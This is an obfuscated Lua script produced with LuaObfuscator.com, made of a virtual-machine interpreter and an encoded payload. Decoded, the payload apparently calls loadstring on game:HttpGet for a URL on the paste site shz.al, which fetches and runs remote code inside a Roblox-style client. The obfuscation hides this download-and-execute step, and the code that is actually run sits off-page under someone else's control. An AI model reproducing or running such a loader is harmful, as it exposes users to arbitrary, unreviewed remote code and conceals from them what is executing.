--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%((3 -(1 + 0))^(((v33-1) -(v32-(2 -1))) + (1638 -(1523 + 114)))) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=931 -((1814 -(892 + 65)) + (176 -102)) ;local v85;while true do if (v84==(568 -(367 + (371 -170)))) then v85=(1272 -(226 + 1044))^(v32-((1703 -775) -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (118 -(32 + 85))) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;return (v36 * (606 -(87 + 263))) + v35 ;end local function v23()local v37=(0 -0) + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(3 -2)) then return (v41 * (47505959 -(5342123 + 25386620))) + (v40 * ((118135 -51647) -(802 + 150))) + (v39 * (689 -433)) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (3 -0) );v18=v18 + (6 -2) ;v37=2 -1 ;end end end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,792 -(217 + 151 + 423) ,62 -42 ) * (2^(50 -(10 + 8)))) + v42 ;local v46=v20(v43,80 -59 ,31);local v47=((v20(v43,474 -(416 + 26) )==(3 -2)) and  -1) or (1 + 0) ;if (v46==(0 -0)) then if (v45==0) then return v47 * 0 ;else v46=3 -2 ;v44=438 -(145 + 293) ;end elseif (v46==(2477 -(44 + (1370 -984)))) then return ((v45==(1486 -(998 + 488))) and (v47 * ((1 + 0)/((859 -(814 + 45)) + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1795 -(201 + (1406 -835))) ) * (v44 + (v45/((1140 -(116 + 1022))^((12 + 204) -164)))) ;end local function v25(v48)local v49;if  not v48 then local v86=0 + 0 ;while true do if (v86==((2998 -2113) -(261 + 624))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1081 -((4829 -3809) + 60)) );v18=v18 + v48 ;local v50={};for v65=1424 -(630 + 793) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(4 -2)) then else v56=nil;v57=nil;v51=10 -7 ;end if ((870 -(550 + 317))==v51) then v58=nil;while true do if (2==v52) then local v96=0 -0 ;while true do if ((1 -0)==v96) then return v56;end if (v96==0) then for v106=3 -2 ,v23() do local v107=0;local v108;local v109;local v110;while true do if ((1213 -(323 + 889))==v107) then v110=nil;while true do if ((0 -0)==v108) then v109=580 -(361 + 219) ;v110=nil;v108=286 -(134 + 151) ;end if (v108~=(1666 -(970 + 695))) then else while true do if (v109==(0 -0)) then v110=v21();if (v20(v110,1 + 0 ,414 -(15 + 398) )==(1990 -(582 + 1408))) then local v172=0 -0 ;local v173;local v174;local v175;local v176;local v177;local v178;while true do if (v172==(3 -0)) then while true do if (v173~=(7 -5)) then else v178=nil;while true do if (v174~=2) then else while true do if (v175~=1) then else local v182=982 -(18 + 964) ;local v183;local v184;while true do if (v182~=0) then else v183=1824 -(1195 + 629) ;v184=nil;v182=1;end if (v182~=(1 + 0)) then else while true do if (v183~=0) then else v184=0;while true do if ((0 -0)~=v184) then else v178={v22(),v22(),nil,nil};if (v176==0) then local v193=0 + 0 ;local v194;while true do if (v193~=(0 + 0)) then else v194=0;while true do if (v194~=0) then else v178[6 -3 ]=v22();v178[130 -(116 + 10) ]=v22();break;end end break;end end elseif (v176==(1 -0)) then v178[1 + 2 ]=v23();elseif (v176==(3 -1)) then v178[1 + 2 ]=v23() -((2 + 0)^(1652 -(1373 + 263))) ;elseif (v176==(2 + 1)) then local v203=0 -0 ;local v204;while true do if (v203~=(1000 -(451 + 549))) then else v204=1551 -(1126 + 425) ;while true do if (v204==0) then v178[408 -(118 + 287) ]=v23() -((1 + 1)^(24 -8)) ;v178[6 -2 ]=v22();break;end end break;end end end v184=3 -2 ;end if (v184==(1385 -(746 + 638))) then v175=1123 -(118 + 1003) ;break;end end break;end end break;end end end if (v175~=3) then else if (v20(v177,2 + 1 ,380 -(142 + 235) )==(1 -0)) then v178[345 -(218 + 123) ]=v58[v178[1 + 3 ]];end v53[v106]=v178;break;end if (v175==0) then local v186=1581 -(1535 + 46) ;local v187;while true do if (v186==(0 + 0)) then v187=0 + 0 ;while true do if (v187==(560 -(306 + 254))) then v176=v20(v110,1 + 1 ,5 -2 );v177=v20(v110,7 -3 ,6 + 0 );v187=1468 -(899 + 568) ;end if (v187~=(1 + 0)) then else v175=1;break;end end break;end end end if (v175~=(1 + 1)) then else local v188=0;local v189;while true do if (v188==0) then v189=0 + 0 ;while true do if (0==v189) then local v192=0 -0 ;while true do if (v192==(2 -1)) then v189=1;break;end if (v192~=(0 -0)) then else if (v20(v177,1 + 0 ,2 -1 )~=1) then else v178[9 -7 ]=v58[v178[605 -(268 + 335) ]];end if (v20(v177,292 -(60 + 230) ,2)~=(754 -(239 + 514))) then else v178[575 -(426 + 146) ]=v58[v178[3]];end v192=1;end end end if (v189==1) then v175=3;break;end end break;end end end end break;end if (v174~=(1 + 0)) then else local v181=0 + 0 ;while true do if (v181==0) then v177=nil;v178=nil;v181=1;end if (v181~=(1457 -(282 + 1174))) then else v174=813 -(569 + 242) ;break;end end end if (v174~=(0 + 0)) then else v175=0 -0 ;v176=nil;v174=1 + 0 ;end end break;end if (v173~=(1025 -(706 + 318))) then else local v179=1130 -(369 + 761) ;while true do if (v179~=(1252 -(721 + 530))) then else v173=1273 -(945 + 326) ;break;end if (v179~=0) then else v176=nil;v177=nil;v179=2 -1 ;end end end if ((0 + 0)~=v173) then else local v180=0 -0 ;while true do if (v180==(701 -(271 + 429))) then v173=1 + 0 ;break;end if (v180~=0) then else v174=1500 -(1408 + 92) ;v175=nil;v180=1087 -(461 + 625) ;end end end end break;end if ((1290 -(993 + 295))==v172) then v177=nil;v178=nil;v172=339 -(144 + 192) ;end if (1==v172) then v175=nil;v176=nil;v172=2;end if (v172==(0 + 0)) then v173=1171 -(418 + 753) ;v174=nil;v172=1;end end end break;end end break;end end break;end if (v107~=(0 + 0)) then else v108=0 + 0 ;v109=nil;v107=1;end end end for v111=1 + 0 ,v23() do v54[v111-(1 + 0) ]=v28();end v96=1581 -(1183 + 397) ;end end end if (v52==(0 + 0)) then local v97=0 + 0 ;while true do if (v97~=(530 -(406 + 123))) then else local v104=1769 -(1749 + 20) ;while true do if (v104~=(1 + 0)) then else v97=2 + 0 ;break;end if (v104~=(1975 -(1913 + 62))) then else v55={};v56={v53,v54,nil,v55};v104=1146 -(466 + 679) ;end end end if (v97==(0 -0)) then local v105=0 -0 ;while true do if ((1900 -(106 + 1794))~=v105) then else v53={};v54={};v105=1 + 0 ;end if (v105~=(1 + 0)) then else v97=2 -1 ;break;end end end if (v97~=(858 -(564 + 292))) then else v52=2 -1 ;break;end end end if (v52==(115 -(4 + 110))) then v57=v23();v58={};for v99=585 -(57 + 527) ,v57 do local v100=304 -(244 + 60) ;local v101;local v102;local v103;while true do if ((1427 -(41 + 1386))==v100) then v101=0;v102=nil;v100=1 + 0 ;end if ((477 -(41 + 435))~=v100) then else v103=nil;while true do if (v101==(103 -(17 + 86))) then v102=v21();v103=nil;v101=1 + 0 ;end if (v101~=1) then else if (v102==(1 -0)) then v103=v21()~=(0 -0) ;elseif (v102==(168 -(122 + 44))) then v103=v24();elseif (v102~=3) then else v103=v25();end v58[v99]=v103;break;end end break;end end end v56[5 -2 ]=v21();v52=2;end end break;end if (v51~=(3 -2)) then else v54=nil;v55=nil;v51=2 + 0 ;end if (v51==0) then v52=1138 -(782 + 356) ;v53=nil;v51=1 + 0 ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v88=0;while true do if (v88==1) then if (v80<=3) then if (v80<=1) then if (v80>0) then v77[v79[2]]();elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end elseif (v80==2) then local v113=0;local v114;local v115;local v116;local v117;while true do if (1==v113) then v72=(v116 + v114) -1 ;v117=0;v113=2;end if (v113==2) then for v142=v114,v72 do local v143=0;while true do if (v143==0) then v117=v117 + 1 ;v77[v142]=v115[v117];break;end end end break;end if (v113==0) then v114=v79[2];v115,v116=v70(v77[v114](v13(v77,v114 + 1 ,v79[3])));v113=1;end end else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=5) then if (v80==4) then local v119=0;local v120;local v121;while true do if (v119==0) then v120=v79[2];v121=v77[v79[3]];v119=1;end if (v119==1) then v77[v120 + 1 ]=v121;v77[v120]=v121[v79[4]];break;end end else do return;end end elseif (v80<=6) then local v122=v79[2];v77[v122]=v77[v122](v13(v77,v122 + 1 ,v72));elseif (v80>7) then v77[v79[2]]=v79[3];else local v130=0;local v131;local v132;local v133;local v134;local v135;while true do if (v130==0) then v131=nil;v132,v133=nil;v134=nil;v135=nil;if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end v130=1;end if (v130==5) then v131=0;for v160=v135,v72 do local v161=0;while true do if (0==v161) then v131=v131 + 1 ;v77[v160]=v132[v131];break;end end end v71=v71 + 1 ;v79=v67[v71];v135=v79[2];v130=6;end if (v130==4) then v71=v71 + 1 ;v79=v67[v71];v135=v79[2];v132,v133=v70(v77[v135](v13(v77,v135 + 1 ,v79[3])));v72=(v133 + v135) -1 ;v130=5;end if (v130==3) then v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v130=4;end if (v130==1) then v71=v71 + 1 ;v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end v71=v71 + 1 ;v79=v67[v71];v130=2;end if (v130==7) then v79=v67[v71];do return;end break;end if (v130==2) then v135=v79[2];v134=v77[v79[3]];v77[v135 + 1 ]=v134;v77[v135]=v134[v79[4]];v71=v71 + 1 ;v130=3;end if (v130==6) then v77[v135]=v77[v135](v13(v77,v135 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v130=7;end end end v71=v71 + 1 ;break;end if (v88==0) then v79=v67[v71];v80=v79[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403133O00682O7470733A2O2F73687A2E616C2F436D737200093O0012073O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
